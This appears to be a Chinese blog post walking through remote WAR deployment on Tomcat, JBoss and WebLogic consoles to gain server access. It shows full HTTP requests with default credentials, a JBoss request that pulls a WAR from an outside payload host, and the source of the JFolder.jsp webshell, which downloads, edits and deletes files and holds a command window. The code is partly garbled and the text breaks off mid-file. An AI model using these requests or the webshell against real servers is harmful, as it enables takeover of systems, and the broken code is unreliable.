• 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

三种远程部署war包检测

开发技术 开发技术 3天前 9次浏览

简介

远程部署漏洞属于服务器、中间件配置问题,攻击者可通过远程部署漏洞获取系统权限,远程部署漏洞经常出现在Tomcat、Jboss、Weblogic等web容器之上。

0x01 ### tomcat部署war包
http://192.168.52.128:8080/manager/html

tomcat/tomcat
三种远程部署war包检测

POST /manager/html/upload;jsessionid=A0F8351E37AA865DDFC5EC921BFB4F9A?org.apache.catalina.filters.CSRF_NONCE=7C49D0AF0355D531EAB7DFE30F00FFA1 HTTP/1.1
Host: 192.168.52.128:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:8080/manager/html
Cookie: JSESSIONID=A0F8351E37AA865DDFC5EC921BFB4F9A
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------32062524929426
Content-Length: 31723

-----------------------------32062524929426
Content-Disposition: form-data; name="deployWar"; filename="test3693.war"
Content-Type: application/octet-stream

<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
	 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	 xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
	 version="2.4">
    <session-config>
        <session-timeout>
            30
        </session-timeout>
    </session-config>
    <welcome-file-list>
	<welcome-file>
            index.jsp
        </welcome-file>
    </welcome-file-list>
</web-app>

%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>

String formatPath(String p)
{
	StringBuffer sb=new StringBuffer();
	for (int i = 0; i < p.length(); i++) 
	{
		if(p.charAt(i)=='\')
		{
			sb.append("\\");
		}
		else
		{
			sb.append(p.charAt(i));
		}
	}
	return sb.toString();
}

	/**
	 * Converts some important chars (int) to the corresponding html string
	 */
	static String conv2Html(int i) {
		if (i == '&') return "&amp;";
		else if (i == '<') return "&lt;";
		else if (i == '>') return "&gt;";
		else if (i == '"') return "&quot;";
		else return "" + (char) i;
	}

	/**
	 * Converts a normal string to a html conform string
	 */
	static String htmlEncode(String st) {
		StringBuffer buf = new StringBuffer();
		for (int i = 0; i < st.length(); i++) {
			buf.append(conv2Html(st.charAt(i)));
		}
		return buf.toString();
	}
 
-----------------------------32062524929426--

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=19B04531B519E953AAD3E2200F9F3D84; Path=/manager; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Mon, 22 Feb 2021 05:02:48 GMT
Connection: close
Content-Length: 19860

<html>
<head>
<style>
H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}
  table {
    width: 100%;
  }
  td.page-title {
    text-align: center;
    vertical-align: top;
    font-family:sans-serif,Tahoma,Arial;
    font-weight: bold;
    background: white;
    color: black;
  }
  td.title {
    text-align: left;
    vertical-align: top;
    font-family:sans-serif,Tahoma,Arial;
    font-style:italic;
    font-weight: bold;
    background: #D2A41C;
  }
  td.header-left {
    text-align: left;
    vertical-align: top;
    font-family:sans-serif,Tahoma,Arial;
    font-weight: bold;
    background: #FFDC75;
  }
  td.header-center {
    text-align: center;
    vertical-align: top;
    font-family:sans-serif,Tahoma,Arial;
    font-weight: bold;
    background: #FFDC75;
  }
  td.row-left {
    text-align: left;
    vertical-align: middle;
    font-family:sans-serif,Tahoma,Arial;
    color: black;
  }
  td.row-center {
    text-align: center;
    vertical-align: middle;
    font-family:sans-serif,Tahoma,Arial;
    color: black;
  }
  td.row-right {
    text-align: right;
    vertical-align: middle;
    font-family:sans-serif,Tahoma,Arial;
    color: black;
  }
  TH {
    text-align: center;
    vertical-align: top;
    font-family:sans-serif,Tahoma,Arial;
    font-weight: bold;
    background: #FFDC75;
  }
  TD {
    text-align: center;
    vertical-align: middle;
    font-family:sans-serif,Tahoma,Arial;
    color: black;
  }
  form {
    margin: 1;
  }
  form.inline {
    display: inline;
  }
</style>
<title>/manager</title>
</head>

<body bgcolor="#FFFFFF">

<table cellspacing="4" border="0">
 <tr>
  <td colspan="2">
   <a href="http://tomcat.apache.org/">
    <img border="0" alt="The Tomcat Servlet/JSP Container"
         align="left" src="/manager/images/tomcat.gif">
   </a>
   <a href="http://www.apache.org/">
    <img border="0" alt="The Apache Software Foundation" align="right"
         src="/manager/images/asf-logo.svg" style="width: 266px; height: 83px;">
   </a>
  </td>
 </tr>
</table>
<hr size="1" noshade="noshade">
<table cellspacing="4" border="0">
 <tr>
  <td class="page-title" bordercolor="#000000" align="left" nowrap>
   <font size="+2">Tomcat Web Application Manager</font>
  </td>
 </tr>
</table>
<br>

http://192.168.52.128:8080/manager/html/upload;jsessionid=A0F8351E37AA865DDFC5EC921BFB4F9A?org.apache.catalina.filters.CSRF_NONCE=7C49D0AF0355D531EAB7DFE30F00FFA1

点击刚刚创建的文件夹

三种远程部署war包检测

成功部署响应如下:

FAIL – War file “test3693.war” already exists on server

http://192.168.52.128:8080/test3693/

三种远程部署war包检测

0x02### Jboss远程部署war包
http://192.168.52.128

三种远程部署war包检测

http://192.168.52.128/jmx-console/
三种远程部署war包检测

http://192.168.52.128/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
三种远程部署war包检测

POST /jmx-console/HtmlAdaptor HTTP/1.1
Host: 192.168.52.120
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://192.168.52.128
Connection: close
Referer: http://192.168.52.128/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
Cookie: PHPSESSID=ft4551u5ag2pu53sf5n4mgfqr0; immortal_png=undefined; immortal_etag=undefined; immortal_cache=undefined; md=nilihQQQmUvSPuXD1pm61Hk6EMV3222QLOzt4QJQaE8qzwt0lfxNnhjruFVW7odj; JSESSIONID=678AC48E10C635F07B63DEBEAE69ECD6
Upgrade-Insecure-Requests: 1

action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2Fpayload.com%2Ftest.war

0x03 ### weblogic部署war包
http://192.168.52.128:7001/console/login/LoginForm.jsp

weblogic:Oracle@123

weblogic常用弱口令: http://cirt.net/passwords?criteria=weblogic

GET /console/login/LoginForm.jsp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/login/LoginForm.jsp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951
Connection: close
Cache-Control: max-age=0
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 22 Feb 2021 05:56:57 GMT
Pragma: no-cache
Content-Length: 3162
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" >
<title>Oracle WebLogic Server Administration Console</title>
<link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css" >
<link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css" >
<link rel="stylesheet" type="text/css" href="/console/css/login.css" >

<script type="text/javascript">
  // Disable frame hijacking  
  if (top != self) top.location.href = location.href;
</script>

<style type="text/css">
html {
    background-color: #185E87;
}
</style>
</head>
<body onload="document.loginData.j_username.focus();">
  <div id="top">
    <div id="login-header">
      <div id="logo">
        
        <img src="/console/framework/skins/wlsconsole/images/Branding_Login_WeblogicConsole.gif" alt="Oracle WebLogic Server Administration Console ">
      </div>
    </div>
    <div id="content">
      <div id="sidebar">
        <img src="/console/framework/skins/wlsconsole/images/Login_11gLogo1.gif" alt="">
      </div>
      <div id="login">
        <div id="title">
          Welcome
        </div>
        <div id="login-form">

    <form id="loginData" name="loginData" method="post" action="/console/j_security_check">
      <div class="message-row">
        <noscript><p class="loginFailed">JavaScript is required. Enable JavaScript to use WebLogic Administration Console.</p></noscript>
        
        
        
          <p>Log in to work with the WebLogic Server domain</p>
        
        
      </div>
      <div class="input-row">
        <label for="j_username">
        Username:</label>
        <span class="ctrl">
          <input class="textinput" type="text" autocomplete="on" name="j_username" id="j_username">
        </span>
      </div>
      <div class="input-row">
        <label for="j_password">
          Password:</label>
        <span class="ctrl">
          <input class="textinput" type="password" autocomplete="on" name="j_password" id="j_password">
        </span>
      </div>
      <div class="button-row">
        <span class="ctrl">
          <input class="formButton" type="submit" 
            onclick="form.submit();this.disabled=true;document.body.style.cursor = 'wait'; this.className='formButton-disabled';"
            value='Login'>
        </span>
        <input type="hidden" name="j_character_encoding" value="UTF-8">
      </div>
    </form>
        </div>
      </div>
    </div>
    <div id="info">
    </div>
  </div>

  <div class="login-footer">
    <div class="info">
      
      <p id="footerVersion">WebLogic Server Version: 10.3.6.0</p>
      <p id="copyright">Copyright &copy; 1996, 2011, Oracle and/or its affiliates. All rights reserved.</p>
      <p id="trademark">Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.</p>
    </div>
  </div>
</body>
</html>

登录成功后调整到如下地址:

http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1

三种远程部署war包检测

后台上传webshell

获取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表:

三种远程部署war包检测

点击部署的数据包如下:

GET /console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:08:41 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 43772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Summary of Deployments - base_domain - WLS Console</title><link rel="stylesheet" type="text/css" href="/console/framework/skeletons/wlsconsole/css/layout.css"><script src="/console/framework/skeletons/wlsconsole/js/buttons.js" type="text/javascript"></script><script src="/console/framework/skeletons/wlsconsole/js/util.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/menu.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/console.css"><link rel="stylesheet" type="text/css" href="/console/css/content.css"><script src="/console/javascript/consoleUtil.js" type="text/javascript"></script><script src="/console/javascript/console-help.js" type="text/javascript"></script><script src="/console/javascript/recorder.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/changemgmt.css"><link rel="stylesheet" type="text/css" href="/console/css/forms.css"><script src="/console/javascript/changemgmt.js" type="text/javascript"></script><script src="/console/javascript/form.js" type="text/javascript"></script><script src="/console/javascript/PredicateEditor.js" type="text/javascript"></script><script src="/console/javascript/table.js" type="text/javascript"></script><script src="/console/javascript/portletrefresh.js" type="text/javascript"></script><script src="/console/javascript/ButtonMenu.js" type="text/javascript"></script><script src="/console/javascript/chooser.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/navtree.css"><script src="/console/javascript/tree.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/quicklinks.css"><link rel="stylesheet" type="text/css" href="/console/css/systemstatus.css"></head><body><div class="wlsc-header"><div id="console-header-logo"><a href="#repetitive_links"><img src="images/spacer.gif" alt="Skip repetitive links "></a><div><a href="http://192.168.52.128:7001/console/console.portal?_nfpb=true&amp;_pageLabel=HomePage1" title="WebLogic Server Administration Console Home"><img src="framework/skins/wlsconsole/images/Branding_WeblogicConsole.gif" id="console-title" alt="WebLogic Server Administration Console Home "></a></div></div><div id="global-links"><span id="pageStatus"><img src="framework/skins/wlsconsole/images/pageIdle.gif" id="pageIdle" title="Idle" alt="Idle"><img src="framework/skins/wlsconsole/images/pageBusy.gif" id="pageBusy" title="Busy" alt="Busy"></span></div><div id="header-trans"><img src="framework/skins/wlsconsole/images/gradient-white-none.png" alt=""></div></div><div id="Home" class="wlsc-book"><div class="wlsc-book-content"><div id="page" class="wlsc-page"><div class="wlsc-2col-layout"><div id="console-content-col"><div id="console-content-col-inner"><div id="ToolbarBook" class="none"><div class="wlsc-book-content"><div id="ToolbarPage" class="wlsc-page"><div id="portlet_toolbar" class="wlsc-window  "><div class="wlsc-window-content">

点击安装,选择“上载文件”:

三种远程部署war包检测

选择需要上载的本地war包

三种远程部署war包检测

上传的数据包

POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/uploadApp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/selectUploadApp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------8434166712903
Content-Length: 32108

-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadAppPath"; filename="test3693.war"
Content-Type: application/octet-stream


<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
	 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	 xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
	 version="2.4">
    <session-config>
        <session-timeout>
            30
        </session-timeout>
    </session-config>
    <welcome-file-list>
	<welcome-file>
            index.jsp
        </welcome-file>
    </welcome-file-list>
</web-app>

%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本,0 : 中文; 1:英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> 写的不好,将就着用吧 - - by 慈勤强 http://www.topronet.com </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage   = {"文 件 管 理","File Management"};
String[] strCommand      = {"CMD 命 令","Command Window"};
String[] strSysProperty  = {"系 统 属 性","System Property"};
String[] strHelp         = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers      = {"驱动器","Drivers"};
String[] strFileName     = {"文件名称","File Name"};
String[] strFileSize     = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit     = {"修改","Edit"};
String[] strFileDown     = {"下载","Download"};
String[] strFileCopy     = {"复制","Move"};
String[] strFileDel      = {"删除","Delete"};
String[] strExecute      = {"执行","Execute"};
String[] strBack         = {"返回","Back"};
String[] strFileSave     = {"保存","Save"};

public class FileHandler
{
	private String strAction="";
	private String strFile="";
	void FileHandler(String action,String f)
	{
	
	}
}

public static class UploadMonitor {

		static Hashtable uploadTable = new Hashtable();

		static void set(String fName, UplInfo info) {
			uploadTable.put(fName, info);
		}

		static void remove(String fName) {
			uploadTable.remove(fName);
		}

		static UplInfo getInfo(String fName) {
			UplInfo info = (UplInfo) uploadTable.get(fName);
			return info;
		}
}

public class UplInfo {

		public long totalSize;
		public long currSize;
		public long starttime;
		public boolean aborted;

		public UplInfo() {
			totalSize = 0l;
			currSize = 0l;
			starttime = System.currentTimeMillis();
			aborted = false;
		}

		public UplInfo(int size) {
			totalSize = size;
			currSize = 0;
			starttime = System.currentTimeMillis();
			aborted = false;
		}

		public String getUprate() {
			long time = System.currentTimeMillis() - starttime;
			if (time != 0) {
				long uprate = currSize * 1000 / time;
				return convertFileSize(uprate) + "/s";
			}
			else return "n/a";
		}

		public int getPercent() {
			if (totalSize == 0) return 0;
			else return (int) (currSize * 100 / totalSize);
		}

		public String getTimeElapsed() {
			long time = (System.currentTimeMillis() - starttime) / 1000l;
			if (time - 60l >= 0){
				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
				else return time / 60 + ":0" + (time % 60) + "m";
			}
			else return time<10 ? "0" + time + "s": time + "s";
		}

		public String getTimeEstimated() {
			if (currSize == 0) return "n/a";
			long time = System.currentTimeMillis() - starttime;
			time = totalSize * time / currSize;
			time /= 1000l;
			if (time - 60l >= 0){
				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
				else return time / 60 + ":0" + (time % 60) + "m";
			}
			else return time<10 ? "0" + time + "s": time + "s";
		}

	}

	public class FileInfo {

		public String name = null, clientFileName = null, fileContentType = null;
		private byte[] fileContents = null;
		public File file = null;
		public StringBuffer sb = new StringBuffer(100);

		public void setFileContents(byte[] aByteArray) {
			fileContents = new byte[aByteArray.length];
			System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
		}
}

// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {

		private final String lineSeparator = System.getProperty("line.separator", "n");
		private final int ONE_MB = 1024 * 1;

		public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
				int clength) throws IllegalArgumentException, IOException {
			if (is == null) throw new IllegalArgumentException("InputStream");
			if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
					""" + boundary + "" is an illegal boundary indicator");
			boundary = "--" + boundary;
			StringTokenizer stLine = null, stFields = null;
			FileInfo fileInfo = null;
			Hashtable dataTable = new Hashtable(5);
			String line = null, field = null, paramName = null;
			boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
			boolean isFile = false;
			if (saveFiles) { // Create the required directory (including parent dirs)
				File f = new File(saveInDir);
				f.mkdirs();
			}
			line = getLine(is);
			if (line == null || !line.startsWith(boundary)) throw new IOException(
					"Boundary not found; boundary = " + boundary + ", line = " + line);
			while (line != null) {
				if (line == null || !line.startsWith(boundary)) return dataTable;
				line = getLine(is);
				if (line == null) return dataTable;
				stLine = new StringTokenizer(line, ";rn");
				if (stLine.countTokens() < 2) throw new IllegalArgumentException(
						"Bad data in second line");
				line = stLine.nextToken().toLowerCase();
				if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
						"Bad data in second line");
				stFields = new StringTokenizer(stLine.nextToken(), "="");
				if (stFields.countTokens() < 2) throw new IllegalArgumentException(
						"Bad data in second line");
				fileInfo = new FileInfo();
				stFields.nextToken();
				paramName = stFields.nextToken();
				isFile = false;
				if (stLine.hasMoreTokens()) {
					field = stLine.nextToken();
					stFields = new StringTokenizer(field, "="");
					if (stFields.countTokens() > 1) {
						if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
							fileInfo.name = paramName;
							String value = stFields.nextToken();
							if (value != null && value.trim().length() > 0) {
								fileInfo.clientFileName = value;
								isFile = true;
							}
							else {
								line = getLine(is); // Skip "Content-Type:" line
								line = getLine(is); // Skip blank line
								line = getLine(is); // Skip blank line
								line = getLine(is); // Position to boundary line
								continue;
							}
						}
					}
					else if (field.toLowerCase().indexOf("filename") >= 0) {
						line = getLine(is); // Skip "Content-Type:" line
						line = getLine(is); // Skip blank line
						line = getLine(is); // Skip blank line
						line = getLine(is); // Position to boundary line
						continue;
					}
				}
				boolean skipBlankLine = true;
				if (isFile) {
					line = getLine(is);
					if (line == null) return dataTable;
					if (line.trim().length() < 1) skipBlankLine = false;
					else {
						stLine = new StringTokenizer(line, ": ");
						if (stLine.countTokens() < 2) throw new IllegalArgumentException(
								"Bad data in third line");
						stLine.nextToken(); // Content-Type
						fileInfo.fileContentType = stLine.nextToken();
					}
				}
				if (skipBlankLine) {
					line = getLine(is);
					if (line == null) return dataTable;
				}
				if (!isFile) {
					line = getLine(is);
					if (line == null) return dataTable;
					dataTable.put(paramName, line);
					// If parameter is dir, change saveInDir to dir
					if (paramName.equals("dir")) saveInDir = line;
					line = getLine(is);
					continue;
				}
				try {
					UplInfo uplInfo = new UplInfo(clength);
					UploadMonitor.set(fileInfo.clientFileName, uplInfo);
					OutputStream os = null;
					String path = null;
					if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
							fileInfo.clientFileName));
					else os = new ByteArrayOutputStream(ONE_MB);
					boolean readingContent = true;
					byte previousLine[] = new byte[2 * ONE_MB];
					byte temp[] = null;
					byte currentLine[] = new byte[2 * ONE_MB];
					int read, read3;
					if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
						line = null;
						break;
					}
					while (readingContent) {
						if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
							line = null;
							uplInfo.aborted = true;
							break;
						}
						if (compareBoundary(boundary, currentLine)) {
							os.write(previousLine, 0, read - 2);
							line = new String(currentLine, 0, read3);
							break;
						}
						else {
							os.write(previousLine, 0, read);
							uplInfo.currSize += read;
							temp = currentLine;
							currentLine = previousLine;
							previousLine = temp;
							read = read3;
						}//end else
					}//end while
					os.flush();
					os.close();
					if (!saveFiles) {
						ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
						fileInfo.setFileContents(baos.toByteArray());
					}
					else fileInfo.file = new File(path);
					dataTable.put(paramName, fileInfo);
					uplInfo.currSize = uplInfo.totalSize;
				}//end try
				catch (IOException e) {
					throw e;
				}
			}
			return dataTable;
		}

		/**
		 * Compares boundary string to byte array
		 */
		private boolean compareBoundary(String boundary, byte ba[]) {
			byte b;
			if (boundary == null || ba == null) return false;
			for (int i = 0; i < boundary.length(); i++)
				if ((byte) boundary.charAt(i) != ba[i]) return false;
			return true;
		}

		/** Convenience method to read HTTP header lines */
		private synchronized String getLine(ServletInputStream sis) throws IOException {
			byte b[] = new byte[1024];
			int read = sis.readLine(b, 0, b.length), index;
			String line = null;
			if (read != -1) {
				line = new String(b, 0, read);
				if ((index = line.indexOf('n')) >= 0) line = line.substring(0, index - 1);
			}
			return line;
		}

		public String getFileName(String dir, String fileName) throws IllegalArgumentException {
			String path = null;
			if (dir == null || fileName == null) throw new IllegalArgumentException(
					"dir or fileName is null");
			int index = fileName.lastIndexOf('/');
			String name = null;
			if (index >= 0) name = fileName.substring(index + 1);
			else name = fileName;
			index = name.lastIndexOf('\');
			if (index >= 0) fileName = name.substring(index + 1);
			path = dir + File.separator + fileName;
			if (File.separatorChar == '/') return path.replace('\', File.separatorChar);
			else return path.replace('/', File.separatorChar);
		}
} //End of class HttpMultiPartParser

String formatPath(String p)
{
	StringBuffer sb=new StringBuffer();
	for (int i = 0; i < p.length(); i++) 
	{
		if(p.charAt(i)=='\')
		{
			sb.append("\\");
		}
		else
		{
			sb.append(p.charAt(i));
		}
	}
	return sb.toString();
}

	/**
	 * Converts some important chars (int) to the corresponding html string
	 */
	static String conv2Html(int i) {
		if (i == '&') return "&amp;";
		else if (i == '<') return "&lt;";
		else if (i == '>') return "&gt;";
		else if (i == '"') return "&quot;";
		else return "" + (char) i;
	}

	/**
	 * Converts a normal string to a html conform string
	 */
	static String htmlEncode(String st) {
		StringBuffer buf = new StringBuffer();
		for (int i = 0; i < st.length(); i++) {
			buf.append(conv2Html(st.charAt(i)));
		}
		return buf.toString();
	}
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
*/
{
	StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
	File roots[]=File.listRoots();
	for(int i=0;i<roots.length;i++)
	{
		sb.append(" <a href="javascript:doForm('','"+roots[i]+"\','','','1','');">");
		sb.append(roots[i]+"</a>&nbsp;");
	}
	return sb.toString();
}
static String convertFileSize(long filesize)
{
	//bug 5.09M 显示5.9M
	String strUnit="Bytes";
	String strAfterComma="";
	int intDivisor=1;
	if(filesize>=1024*1024)
	{
		strUnit = "MB";
		intDivisor=1024*1024;
	}
	else if(filesize>=1024)
	{
		strUnit = "KB";
		intDivisor=1024;
	}
	if(intDivisor==1) return filesize + " " + strUnit;
	strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
	if(strAfterComma=="") strAfterComma=".0";
	return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\" + strFile; 
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");

if((tabID==null) || tabID.equals(""))
{
	tabID = "1";
}

if(strDir==null||strDir.length()<1)
{
	strDir = request.getRealPath("/");
}


if(strAction!=null && strAction.equals("down"))
{
	File f=new File(strPath);
	if(f.length()==0)
	{
		sbDown.append("文件大小为 0 字节,就不用下了吧");
	}
	else
	{
		response.setHeader("content-type","text/html; charset=ISO-8859-1");
		response.setContentType("APPLICATION/OCTET-STREAM");	
		response.setHeader("Content-Disposition","attachment; filename=""+f.getName()+""");
		FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
		out.clearBuffer();
		int i;
		while ((i=fileInputStream.read()) != -1)
		{
			out.write(i);	
		}
		fileInputStream.close();
		out.close();
	}
}

if(strAction!=null && strAction.equals("del"))
{
	File f=new File(strPath);
	f.delete();
}

if(strAction!=null && strAction.equals("edit"))
{
	File f=new File(strPath);	
	BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
	sbEdit.append("<form name='frmEdit' action='' method='POST'>rn");
	sbEdit.append("<input type=hidden name=action value=save >rn");
	sbEdit.append("<input type=hidden name=path value='"+strDir+"' >rn");
	sbEdit.append("<input type=hidden name=file value='"+strFile+"' >rn");
	sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
	sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"rn");
	sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
	String line="";
	while((line=br.readLine())!=null)
	{
		sbEdit.append(htmlEncode(line)+"rn");		
	}
   sbEdit.append("</textarea>");
	sbEdit.append("<input type=hidden name=path value="+strDir+">");
	sbEdit.append("</form>");
}

if(strAction!=null && strAction.equals("save"))
{
	File f=new File(strPath);
	BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
	String strContent=request.getParameter("content");
	bw.write(strContent);
	bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
	File f=new File(strPath);
	sbCopy.append("<br><form name='frmCopy' action='' method='POST'>rn");
	sbCopy.append("<input type=hidden name=action value=savecopy >rn");
	sbCopy.append("<input type=hidden name=path value='"+strDir+"' >rn");
	sbCopy.append("<input type=hidden name=file value='"+strFile+"' >rn");
	sbCopy.append("原始文件: "+strPath+"<p>");
